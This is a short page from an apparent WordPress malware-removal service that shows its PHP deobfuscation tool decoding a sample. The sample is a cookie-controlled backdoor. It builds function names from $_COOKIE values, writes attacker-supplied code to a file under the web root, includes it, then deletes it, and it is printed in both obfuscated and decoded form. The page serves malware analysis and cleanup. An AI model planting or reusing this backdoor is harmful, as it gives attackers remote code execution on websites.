Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $IUF=${ "\137". "\103" . "\117". "\117\113". "\111"."\105"}; if ( isset($IUF [(92 -40) ]) ){ $TQUn=$IUF [ ( 91-18) ] . $IUF[ (85- 11 ) ] ; $qCQo = $TQUn ( $IUF [( 94-14 ) ] .$IUF[(62-8 ) ] ) ; $CWy =$qCQo($TQUn ( $IUF [ (66-4 )])); $fvY =$qCQo ( $TQUn ($IUF [ ( 24- 4 ) ] )); $zE= __DIR__. $...



Obfuscated php code

<?php
$IUF=${ "\137".	"\103"	.	"\117".	"\117\113". "\111"."\105"};	 if	( isset($IUF	[(92 -40)		])	){	 	$TQUn=$IUF [ (	91-18)	]	. $IUF[	(85- 11 )		] ;	$qCQo =	$TQUn	( $IUF	[( 94-14	) ] .$IUF[(62-8 )	]	) ; 	$CWy	=$qCQo($TQUn	(	$IUF	[ 	(66-4 )]));		$fvY	=$qCQo	(	$TQUn ($IUF [	(	24- 4 )	]	));		 $zE= __DIR__. $qCQo	($TQUn($IUF[(	44-21)	] )	) ;	 $CWy (	$zE ,$qCQo	(	$TQUn ($IUF [	 ( 66-14	)	] )) )	; 	include(	$zE )	;$fvY($zE	); }

Decoded(de-Obfuscated) php code

<?php

$IUF = $_COOKIE;
if (isset($IUF[52])) {
    $TQUn = $IUF[73] . $IUF[74];
    $qCQo = $TQUn($IUF[80] . $IUF[54]);
    $CWy = $qCQo($TQUn($IUF[62]));
    $fvY = $qCQo($TQUn($IUF[20]));
    $zE = "/var/www/html" . $qCQo($TQUn($IUF[23]));
    $CWy($zE, $qCQo($TQUn($IUF[52])));
    include $zE;
    $fvY($zE);
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.